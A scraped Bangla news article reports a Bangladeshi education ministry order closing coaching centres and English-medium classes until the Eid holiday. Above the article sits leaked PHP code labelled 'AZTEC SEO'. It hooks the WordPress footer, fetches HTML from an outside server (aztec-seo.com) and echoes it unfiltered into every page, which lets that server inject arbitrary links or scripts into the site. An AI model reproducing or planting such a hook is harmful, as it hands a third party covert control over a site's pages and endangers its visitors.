/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); কোচিং সেন্টার বন্ধ নিয়ে শিক্ষা মন্ত্রণালয়ের বিশেষ নির্দেশনা | Dhaka Sky News

ঢাকা ওয়াসার এমডির পদত্যাগ

আগের সংবাদ

ইরানে হামলার বিরোধিতা সুইজারল্যান্ডের, সব পক্ষকে যুদ্ধ বন্ধের আহ্বান

পরের সংবাদ

কোচিং সেন্টার বন্ধ নিয়ে শিক্ষা মন্ত্রণালয়ের বিশেষ নির্দেশনা

যুগান্তর প্রতিবেদন

প্রকাশিত: March 8, 2026 , 6:54 pm

আগামীকাল সোমবার থেকে পবিত্র ঈদুল ফিতরের ছুটি পর্যন্ত সব ধরনের কোচিং সেন্টারের কার্যক্রম বন্ধ থাকবে বলে জানিয়েছে শিক্ষা মন্ত্রণালয়।
রোববার (৮ মার্চ) শিক্ষা মন্ত্রণালয়ের মাধ্যমিক ও উচ্চ শিক্ষা বিভাগের বেসরকারি মাধ্যমিক-১ শাখা থেকে এ সংক্রান্ত নির্দেশনা জারি করা হয়েছে।
নির্দেশনায় বলা হয়েছে, সোমবার থেকে পবিত্র ঈদুল ফিতর উপলক্ষে সরকার ঘোষিত ছুটিকাল পর্যন্ত বাংলা মিডিয়াম ও ইংলিশ মিডিয়ামসহ সব ধরনের কোচিং সেন্টারের সব কার্যক্রম বন্ধ থাকবে।
একইসঙ্গে ইংলিশ মিডিয়াম স্কুলগুলোও সোমবার থেকে পবিত্র ঈদুল ফিতর উপলক্ষে সরকার ঘোষিত ছুটিকাল পর্যন্ত শ্রেণি কার্যক্রম বন্ধ থাকবে বলেও জানানো হয়েছে নির্দেশনায়। তবে, বিদেশি কারিকুলামে পরিচালিত বিদ্যালয়ে শুধুমাত্র আবশ্যিক পরীক্ষাগুলো তাদের নির্ধারিত শিডিউল অনুযায়ী পরিচালিত হবে।
বিবৃতিতে বলা হয়, পবিত্র মাহে রমজানে ঢাকাসহ বাংলাদেশের বিভিন্ন শহরের জনভোগান্তি নিরসন, বিশ্ব পরিস্থিতি বিবেচনায় সব বিদেশি কারিকুলামে পরিচালিত (ইংলিশ মিডিয়াম স্কুল) বিদ্যালয়গুলোর প্রতিনিধি নিয়ে শিক্ষামন্ত্রীর সভাপতিত্বে অনুষ্ঠিত সভায় সর্বসম্মতিক্রমে এ সিদ্ধান্ত গৃহীত হয়েছে।
একইসঙ্গে এই নির্দেশনা সব শিক্ষা বোর্ড চেয়ারম্যান, মাধ্যমিক ও উচ্চ শিক্ষা অধিদফতরের মহাপরিচালক ও সব জেলা প্রশাসককে পাঠানো হয়েছে।